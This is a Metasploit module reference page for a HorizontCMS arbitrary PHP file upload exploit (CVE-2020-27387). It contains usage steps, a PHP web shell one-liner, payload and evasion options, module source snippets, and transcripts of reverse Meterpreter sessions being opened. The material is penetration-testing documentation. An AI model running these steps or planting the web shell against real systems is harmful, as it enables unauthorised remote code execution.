HorizontCMS Arbitrary PHP File Upload - Metasploit


This page contains detailed information about how to use the exploit/multi/http/horizontcms_upload_exec metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: HorizontCMS Arbitrary PHP File Upload
Module: exploit/multi/http/horizontcms_upload_exec
Source code: modules/exploits/multi/http/horizontcms_upload_exec.rb
Disclosure date: 2020-09-24
Last modification time: 2021-08-27 17:15:33 +0000
Supported architecture(s): x86, x64, php
Supported platform(s): Linux, PHP, Windows
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2020-27387

This module exploits an arbitrary file upload vulnerability in HorizontCMS 1.0.0-beta in order to execute arbitrary commands. The module first attempts to authenticate to HorizontCMS. It then tries to upload a malicious PHP file via an HTTP POST request to /admin/file-manager/fileupload. The server will rename this file to a random string. The module will therefore attempt to change the filename back to the original name via an HTTP POST request to /admin/file-manager/rename. For the php target, the payload is embedded in the uploaded file and the module attempts to execute the payload via an HTTP GET request to /storage/file_name. For the linux and windows targets, the module uploads a simple PHP web shell similar to <?php system($_GET["cmd"]); ?>. Subsequently, it leverages the CmdStager mixin to deliver the final payload via a series of HTTP GET requests to the PHP web shell. Valid credentials for a HorizontCMS user with permissions to use the FileManager are required. This would be all users in the Admin, Manager and Editor groups if HorizontCMS is configured with the default group settings.This module has been successfully tested against HorizontCMS 1.0.0-beta running on Ubuntu 18.04.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


msf > use exploit/multi/http/horizontcms_upload_exec
msf exploit(horizontcms_upload_exec) > exploit

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Vulnerable Application


This module exploits an arbitrary file upload vulnerability (CVE-2020-27387) in HorizontCMS 1.0.0-beta and prior in order to execute arbitrary commands.

The module first tries to obtain the HorizontCMS version and a csrf token from /admin/login. Next, the module tries to authenticate via an HTTP POST request to the same destination.

If authentication is successful, the module tries to upload a malicious PHP file via an HTTP POST request to /admin/file-manager/fileupload. The server will store the file, but will rename it to a random string. The module will therefore attempt to change the filename back to the original name via an HTTP POST request to /admin/file-manager/rename.

If the php target is selected, the payload is embedded in the uploaded file and the module attempts to execute the payload via an HTTP GET request to /storage/file_name. For the linux and windows targets, the module uploads a simple PHP web shell similar to <?php system($_GET["cmd"]); ?>. Subsequently, it leverages the CmdStager mixin to deliver the final payload via a series of HTTP GET requests in the form of /storage/<php_web_shell>?<cmd>=<payload>.

Valid credentials for a HorizontCMS user with permissions to use the FileManager are required. This would be all users in the Admin, Manager and Editor groups if HorizontCMS is configured with the default group settings. This module has been successfully tested against HorizontCMS 1.0.0-beta running on Ubuntu 18.04.

Vulnerable software for testing is available on GitHub here. Detailed installation instructions for Ubuntu 16.04 and 18.04 are available here. These instructions recommend configuring a virtual host for HorizontCMS. If a virtual host is enabled on the target, successful exploitation requires the vhost option to be set for the module.

Verification Steps


  1. Install the module as usual
  2. Start msfconsole
  3. Do: use exploit/multi/http/HorizontCMS_upload_exec
  4. Do: set RHOSTS [IP]
  5. Do: set USERNAME [username for the HorizontCMS account]
  6. Do: set PASSWORD [password for the HorizontCMS account]
  7. Do: set target [target]
  8. Do: set payload [payload]
  9. Do: set LHOST [IP]
  10. Do: exploit

Options


PASSWORD

The password for the HorizontCMS account to authenticate with.

TARGETURI

The base path to HorizontCMS. The default value is /.

USERNAME

The username for the HorizontCMS account to authenticate with.

Targets


Id  Name
--  ----
0   PHP
1   Linux
2   Windows

Scenarios


HorizontCMS 1.0.0-beta running on Ubuntu 18.04) - PHP target

msf6 exploit(multi/http/horizontcms_upload_exec) > show options 

Module options (exploit/multi/http/horizontcms_upload_exec):

   Name       Current Setting   Required  Description
   ----       ---------------   --------  -----------
   PASSWORD   test              yes       Password to authenticate with
   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.1.227     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT      80                yes       The target port (TCP)
   SSL        false             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                 yes       The base path to HorizontCMS
   URIPATH                      no        The URI to use for this exploit (default is random)
   USERNAME   test              yes       Username to authenticate with
   VHOST      testhorizont.com  no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.128    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   PHP


msf6 exploit(multi/http/horizontcms_upload_exec) > run

[*] Started reverse TCP handler on 192.168.1.128:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Target is HorizontCMS with version 1.0.0-beta
[+] Successfully authenticated to the HorizontCMS dashboard
[*] Uploading payload as EaCPK1HSbRru.php...
[+] Successfully uploaded EaCPK1HSbRru.php. The server renamed it to Mflikdb8nNKTivXU3HPZnpsCy3nOu34FH1IsWaxl
[+] Successfully renamed payload back to EaCPK1HSbRru.php
[*] Executing the payload...
[*] Sending stage (39264 bytes) to 192.168.1.227
[*] Meterpreter session 1 opened (192.168.1.128:4444 -> 192.168.1.227:49968) at 2020-10-31 15:52:57 -0400
[+] Successfully deleted EaCPK1HSbRru.php

meterpreter > getuid
Server username: www-data (33)
meterpreter >

HorizontCMS 1.0.0-beta running on Ubuntu 18.04 - Linux target

msf6 exploit(multi/http/horizontcms_upload_exec) > run

[*] Started reverse TCP handler on 192.168.1.128:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Target is HorizontCMS with version 1.0.0-beta
[+] Successfully authenticated to the HorizontCMS dashboard
[*] Uploading payload as W6nQKce4Uq.php...
[+] Successfully uploaded W6nQKce4Uq.php. The server renamed it to L6TL9BHTAckj6UrzfSyOBvAT3Bl2uFskRHrG3pXG
[+] Successfully renamed payload back to W6nQKce4Uq.php
[*] Executing the payload via a series of HTTP GET requests to `/storage/W6nQKce4Uq.php?qo1E=`
[*] Sending stage (3008420 bytes) to 192.168.1.227
[*] Command Stager progress - 100.00% done (897/897 bytes)
[*] Meterpreter session 2 opened (192.168.1.128:4444 -> 192.168.1.227:49978) at 2020-10-31 15:56:58 -0400
[+] Successfully deleted W6nQKce4Uq.php

meterpreter > getuid
Server username: www-data @ ubuntu (uid=33, gid=33, euid=33, egid=33)
meterpreter > 

Go back to menu.

Msfconsole Usage


Here is how the multi/http/horizontcms_upload_exec exploit module looks in the msfconsole:

msf6 > use exploit/multi/http/horizontcms_upload_exec

[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(multi/http/horizontcms_upload_exec) > show info

       Name: HorizontCMS Arbitrary PHP File Upload
     Module: exploit/multi/http/horizontcms_upload_exec
   Platform: Linux, Windows, PHP
       Arch: x86, x64, php
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2020-09-24

Provided by:
  Erik Wynter

Available targets:
  Id  Name
  --  ----
  0   PHP
  1   Linux
  2   Windows

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  PASSWORD                    yes       Password to authenticate with
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      80               yes       The target port (TCP)
  SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT    8080             yes       The local port to listen on.
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /                yes       The base path to HorizontCMS
  URIPATH                     no        The URI to use for this exploit (default is random)
  USERNAME                    yes       Username to authenticate with
  VHOST                       no        HTTP server virtual host

Payload information:
  Avoid: 3 characters

Description:
  This module exploits an arbitrary file upload vulnerability in 
  HorizontCMS 1.0.0-beta in order to execute arbitrary commands. The 
  module first attempts to authenticate to HorizontCMS. It then tries 
  to upload a malicious PHP file via an HTTP POST request to 
  `/admin/file-manager/fileupload`. The server will rename this file 
  to a random string. The module will therefore attempt to change the 
  filename back to the original name via an HTTP POST request to 
  `/admin/file-manager/rename`. For the `php` target, the payload is 
  embedded in the uploaded file and the module attempts to execute the 
  payload via an HTTP GET request to `/storage/file_name`. For the 
  `linux` and `windows` targets, the module uploads a simple PHP web 
  shell similar to `<?php system($_GET["cmd"]); ?>`. Subsequently, it 
  leverages the CmdStager mixin to deliver the final payload via a 
  series of HTTP GET requests to the PHP web shell. Valid credentials 
  for a HorizontCMS user with permissions to use the FileManager are 
  required. This would be all users in the Admin, Manager and Editor 
  groups if HorizontCMS is configured with the default group 
  settings.This module has been successfully tested against 
  HorizontCMS 1.0.0-beta running on Ubuntu 18.04.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2020-27387

Module Options


This is a complete list of options available in the multi/http/horizontcms_upload_exec exploit:

msf6 exploit(multi/http/horizontcms_upload_exec) > show options

Module options (exploit/multi/http/horizontcms_upload_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    yes       Password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The base path to HorizontCMS
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME                    yes       Username to authenticate with
   VHOST                       no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   PHP

Advanced Options


Here is a complete list of advanced options supported by the multi/http/horizontcms_upload_exec exploit:

msf6 exploit(multi/http/horizontcms_upload_exec) > show advanced

Module advanced options (exploit/multi/http/horizontcms_upload_exec):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   AutoCheck               true                                                no        Run check before exploit
   CMDSTAGER::DECODER                                                          no        The decoder stub to use.
   CMDSTAGER::FLAVOR       auto                                                no        The CMD Stager to use. (Accepted: auto, bourne, debug_asm, debug_write, echo, printf, vbs, vbs_adodb, certutil, tftp, wget, curl, fetch, lwprequest, psh_i
                                                                                         nvokewebrequest)
   CMDSTAGER::SSL          false                                               no        Use SSL/TLS for supported stagers
   CMDSTAGER::TEMP                                                             no        Writable directory for staged files
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EXE::Custom                                                                 no        Use custom exe instead of automatically generating a payload exe
   EXE::EICAR              false                                               no        Generate an EICAR file instead of regular payload exe
   EXE::FallBack           false                                               no        Use the default template in case the specified one is missing
   EXE::Inject             false                                               no        Set to preserve the original EXE function
   EXE::OldMethod          false                                               no        Set to use the substitution EXE generation method.
   EXE::Path                                                                   no        The directory in which to look for the executable template
   EXE::Template                                                               no        The executable template file name.
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   ForceExploit            false                                               no        Override check result
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                no        The HTTP username to specify for authentication
   ListenerComm                                                                no        The specific communication channel to use for this service
   MSI::Custom                                                                 no        Use custom msi instead of automatically generating a payload msi
   MSI::EICAR              false                                               no        Generate an EICAR file instead of regular payload msi
   MSI::Path                                                                   no        The directory in which to look for the msi template
   MSI::Template                                                               no        The msi template file name
   MSI::UAC                false                                               no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
   SSLCipher                                                                   no        String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
   SSLCompression          false                                               no        Enable SSL/TLS-level compression
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   SendRobots              false                                               no        Return a robots.txt file if asked for one
   URIHOST                                                                     no        Host to use in URI (useful for tunnels)
   URIPORT                                                                     no        Port to use in URI (useful for tunnels)
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                   no        Specify the workspace for this module
   WfsDelay                2                                                   no        Additional delay in seconds to wait for a session

Payload advanced options (php/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the multi/http/horizontcms_upload_exec module can exploit:

msf6 exploit(multi/http/horizontcms_upload_exec) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   PHP
   1   Linux
   2   Windows

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the multi/http/horizontcms_upload_exec exploit:

msf6 exploit(multi/http/horizontcms_upload_exec) > show payloads

Compatible Payloads
===================

   #   Name                                        Disclosure Date  Rank    Check  Description
   -   ----                                        ---------------  ----    -----  -----------
   0   payload/generic/custom                                       normal  No     Custom Payload
   1   payload/generic/shell_bind_tcp                               normal  No     Generic Command Shell, Bind TCP Inline
   2   payload/generic/shell_reverse_tcp                            normal  No     Generic Command Shell, Reverse TCP Inline
   3   payload/multi/meterpreter/reverse_http                       normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
   4   payload/multi/meterpreter/reverse_https                      normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)
   5   payload/php/bind_perl                                        normal  No     PHP Command Shell, Bind TCP (via Perl)
   6   payload/php/bind_perl_ipv6                                   normal  No     PHP Command Shell, Bind TCP (via perl) IPv6
   7   payload/php/bind_php                                         normal  No     PHP Command Shell, Bind TCP (via PHP)
   8   payload/php/bind_php_ipv6                                    normal  No     PHP Command Shell, Bind TCP (via php) IPv6
   9   payload/php/download_exec                                    normal  No     PHP Executable Download and Execute
   10  payload/php/exec                                             normal  No     PHP Execute Command
   11  payload/php/meterpreter/bind_tcp                             normal  No     PHP Meterpreter, Bind TCP Stager
   12  payload/php/meterpreter/bind_tcp_ipv6                        normal  No     PHP Meterpreter, Bind TCP Stager IPv6
   13  payload/php/meterpreter/bind_tcp_ipv6_uuid                   normal  No     PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support
   14  payload/php/meterpreter/bind_tcp_uuid                        normal  No     PHP Meterpreter, Bind TCP Stager with UUID Support
   15  payload/php/meterpreter/reverse_tcp                          normal  No     PHP Meterpreter, PHP Reverse TCP Stager
   16  payload/php/meterpreter/reverse_tcp_uuid                     normal  No     PHP Meterpreter, PHP Reverse TCP Stager
   17  payload/php/meterpreter_reverse_tcp                          normal  No     PHP Meterpreter, Reverse TCP Inline
   18  payload/php/reverse_perl                                     normal  No     PHP Command, Double Reverse TCP Connection (via Perl)
   19  payload/php/reverse_php                                      normal  No     PHP Command Shell, Reverse TCP (via PHP)

Evasion Options


Here is the full list of possible evasion options supported by the multi/http/horizontcms_upload_exec exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(multi/http/horizontcms_upload_exec) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::chunked                 false            no        Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
   HTTP::compression             none             no        Enable compression of HTTP responses via content encoding (Accepted: none, gzip, deflate)
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::junk_headers            false            no        Enable insertion of random junk HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::no_cache                false            no        Disallow the browser to cache HTTP content
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::server_name             Apache           yes       Configures the Server header of all outgoing replies
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request
   TCP::max_send_size            0                no        Maximum tcp segment size.  (0 = disable)
   TCP::send_delay               0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Connection failed.


Here is a relevant code snippet related to the "Connection failed." error message:

101:	      'uri' => normalize_uri(target_uri.path, 'admin', 'login'),
102:	      'keep_cookies' => true
103:	    })
104:	
105:	    unless res
106:	      return CheckCode::Unknown('Connection failed.')
107:	    end
108:	
109:	    unless res.code == 200 && res.body.include?('HorizontCMS')
110:	      return CheckCode::Safe('Target is not a HorizontCMS application.')
111:	    end

Target is not a HorizontCMS application.


Here is a relevant code snippet related to the "Target is not a HorizontCMS application." error message:

105:	    unless res
106:	      return CheckCode::Unknown('Connection failed.')
107:	    end
108:	
109:	    unless res.code == 200 && res.body.include?('HorizontCMS')
110:	      return CheckCode::Safe('Target is not a HorizontCMS application.')
111:	    end
112:	
113:	    # obtain csrf token
114:	    html = res.get_html_document
115:	    @csrf_token = html.at('meta[@name="csrf-token"]')['content']

Could not determine HorizontCMS version.


Here is a relevant code snippet related to the "Could not determine HorizontCMS version." error message:

116:	
117:	    # obtain version
118:	    /Version: (?<version>.*?)\n/ =~ res.body
119:	
120:	    unless version
121:	      return CheckCode::Detected('Could not determine HorizontCMS version.')
122:	    end
123:	
124:	    # vulnerable versions all start with 1.0.0 followed by `-beta`, `-alpha` or `-alpha.<number>`
125:	    version_no, version_status = version.split('-')
126:	

Target is HorizontCMS with version <VERSION>


Here is a relevant code snippet related to the "Target is HorizontCMS with version <VERSION>" error message:

123:	
124:	    # vulnerable versions all start with 1.0.0 followed by `-beta`, `-alpha` or `-alpha.<number>`
125:	    version_no, version_status = version.split('-')
126:	
127:	    unless version_no == '1.0.0' && version_status && (version_status.include?('alpha') || version_status.include?('beta'))
128:	      return CheckCode::Safe("Target is HorizontCMS with version #{version}")
129:	    end
130:	
131:	    CheckCode::Appears("Target is HorizontCMS with version #{version}")
132:	  end
133:	

Target is HorizontCMS with version <VERSION>


Here is a relevant code snippet related to the "Target is HorizontCMS with version <VERSION>" error message:

126:	
127:	    unless version_no == '1.0.0' && version_status && (version_status.include?('alpha') || version_status.include?('beta'))
128:	      return CheckCode::Safe("Target is HorizontCMS with version #{version}")
129:	    end
130:	
131:	    CheckCode::Appears("Target is HorizontCMS with version #{version}")
132:	  end
133:	
134:	  def login
135:	    # check if @csrf_token is not blank, as this is required for authentication
136:	    if @csrf_token.blank?

Failed to obtain the csrf token required for authentication.


Here is a relevant code snippet related to the "Failed to obtain the csrf token required for authentication." error message:

132:	  end
133:	
134:	  def login
135:	    # check if @csrf_token is not blank, as this is required for authentication
136:	    if @csrf_token.blank?
137:	      fail_with(Failure::Unknown, 'Failed to obtain the csrf token required for authentication.')
138:	    end
139:	
140:	    # try to authenticate
141:	    # Cookies from this request will overwrite the cookies currently in the jar from the +check+ method
142:	    res = send_request_cgi({

Connection failed while trying to authenticate.


Here is a relevant code snippet related to the "Connection failed while trying to authenticate." error message:

151:	        'submit_login' => 'login'
152:	      }
153:	    })
154:	
155:	    unless res
156:	      fail_with(Failure::Unreachable, 'Connection failed while trying to authenticate.')
157:	    end
158:	
159:	    unless res.code == 302 && res.body.include?('Redirecting to')
160:	      fail_with(Failure::UnexpectedReply, 'Unexpected response received while trying to authenticate.')
161:	    end

Unexpected response received while trying to authenticate.


Here is a relevant code snippet related to the "Unexpected response received while trying to authenticate." error message:

155:	    unless res
156:	      fail_with(Failure::Unreachable, 'Connection failed while trying to authenticate.')
157:	    end
158:	
159:	    unless res.code == 302 && res.body.include?('Redirecting to')
160:	      fail_with(Failure::UnexpectedReply, 'Unexpected response received while trying to authenticate.')
161:	    end
162:	
163:	    # using send_request_cgi! does not work so we have to follow the redirect manually
164:	    res = send_request_cgi({
165:	      'method' => 'GET',

Connection failed while trying to authenticate.


Here is a relevant code snippet related to the "Connection failed while trying to authenticate." error message:

165:	      'method' => 'GET',
166:	      'uri' => normalize_uri(target_uri.path, 'admin', 'dashboard')
167:	    })
168:	
169:	    unless res
170:	      fail_with(Failure::Unreachable, 'Connection failed while trying to authenticate.')
171:	    end
172:	
173:	    unless res.code == 200 && res.body.include?('Dashboard - HorizontCMS')
174:	      fail_with(Failure::UnexpectedReply, 'Unexpected response received while trying to authenticate.')
175:	    end

Unexpected response received while trying to authenticate.


Here is a relevant code snippet related to the "Unexpected response received while trying to authenticate." error message:

169:	    unless res
170:	      fail_with(Failure::Unreachable, 'Connection failed while trying to authenticate.')
171:	    end
172:	
173:	    unless res.code == 200 && res.body.include?('Dashboard - HorizontCMS')
174:	      fail_with(Failure::UnexpectedReply, 'Unexpected response received while trying to authenticate.')
175:	    end
176:	
177:	    print_good('Successfully authenticated to the HorizontCMS dashboard')
178:	
179:	    # get new csrf token

Failed to obtain the csrf token required for uploading the payload.


Here is a relevant code snippet related to the "Failed to obtain the csrf token required for uploading the payload." error message:

178:	
179:	    # get new csrf token
180:	    html = res.get_html_document
181:	    @csrf_token = html.at('meta[@name="csrf-token"]')['content']
182:	    if @csrf_token.blank?
183:	      fail_with(Failure::Unknown, 'Failed to obtain the csrf token required for uploading the payload.')
184:	    end
185:	  end
186:	
187:	  def upload_and_rename_payload
188:	    # set payload according to target platform

Connection failed while trying to upload the payload.


Here is a relevant code snippet related to the "Connection failed while trying to upload the payload." error message:

210:	      'headers' => { 'X-Requested-With' => 'XMLHttpRequest' },
211:	      'data' => post_data.to_s
212:	    })
213:	
214:	    unless res
215:	      fail_with(Failure::Disconnected, 'Connection failed while trying to upload the payload.')
216:	    end
217:	
218:	    unless res.code == 200 && res.body.include?('Files uploaded successfully!')
219:	      fail_with(Failure::Unknown, 'Failed to upload the payload.')
220:	    end

Failed to upload the payload.


Here is a relevant code snippet related to the "Failed to upload the payload." error message:

214:	    unless res
215:	      fail_with(Failure::Disconnected, 'Connection failed while trying to upload the payload.')
216:	    end
217:	
218:	    unless res.code == 200 && res.body.include?('Files uploaded successfully!')
219:	      fail_with(Failure::Unknown, 'Failed to upload the payload.')
220:	    end
221:	
222:	    @payload_on_target = res.body.scan(/uploadedFileNames":\["(.*?)"/).flatten.first
223:	    if @payload_on_target.blank?
224:	      fail_with(Failure::Unknown, 'Failed to obtain the new filename of the payload on the server.')

Failed to obtain the new filename of the payload on the server.


Here is a relevant code snippet related to the "Failed to obtain the new filename of the payload on the server." error message:

219:	      fail_with(Failure::Unknown, 'Failed to upload the payload.')
220:	    end
221:	
222:	    @payload_on_target = res.body.scan(/uploadedFileNames":\["(.*?)"/).flatten.first
223:	    if @payload_on_target.blank?
224:	      fail_with(Failure::Unknown, 'Failed to obtain the new filename of the payload on the server.')
225:	    end
226:	
227:	    print_good("Successfully uploaded #{@payload_name}. The server renamed it to #{@payload_on_target}")
228:	
229:	    # rename payload

Connection failed while trying to rename the payload back to <PAYLOAD_NAME>.


Here is a relevant code snippet related to the "Connection failed while trying to rename the payload back to <PAYLOAD_NAME>." error message:

238:	        'new_file' => "/#{@payload_name}"
239:	      }
240:	    })
241:	
242:	    unless res
243:	      fail_with(Failure::Disconnected, "Connection failed while trying to rename the payload back to #{@payload_name}.")
244:	    end
245:	
246:	    unless res.code == 200 && res.body.include?('File successfully renamed!')
247:	      fail_with(Failure::Unknown, "Failed to rename the payload back to #{@payload_name}.")
248:	    end

Failed to rename the payload back to <PAYLOAD_NAME>.


Here is a relevant code snippet related to the "Failed to rename the payload back to <PAYLOAD_NAME>." error message:

242:	    unless res
243:	      fail_with(Failure::Disconnected, "Connection failed while trying to rename the payload back to #{@payload_name}.")
244:	    end
245:	
246:	    unless res.code == 200 && res.body.include?('File successfully renamed!')
247:	      fail_with(Failure::Unknown, "Failed to rename the payload back to #{@payload_name}.")
248:	    end
249:	
250:	    print_good("Successfully renamed payload back to #{@payload_name}")
251:	  end
252:	

Failed to delete the payload.


Here is a relevant code snippet related to the "Failed to delete the payload." error message:

269:	        'file' => "/#{@payload_name}"
270:	      }
271:	    })
272:	
273:	    unless res && res.code == 200 && res.body.include?('File deleted successfully')
274:	      print_error('Failed to delete the payload.')
275:	      print_warning("Manual cleanup of #{@payload_name} is required.")
276:	      return
277:	    end
278:	
279:	    print_good("Successfully deleted #{@payload_name}")

Manual cleanup of <PAYLOAD_NAME> is required.


Here is a relevant code snippet related to the "Manual cleanup of <PAYLOAD_NAME> is required." error message:

270:	      }
271:	    })
272:	
273:	    unless res && res.code == 200 && res.body.include?('File deleted successfully')
274:	      print_error('Failed to delete the payload.')
275:	      print_warning("Manual cleanup of #{@payload_name} is required.")
276:	      return
277:	    end
278:	
279:	    print_good("Successfully deleted #{@payload_name}")
280:	  end

Go back to menu.


References


Authors


  • Erik Wynter

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.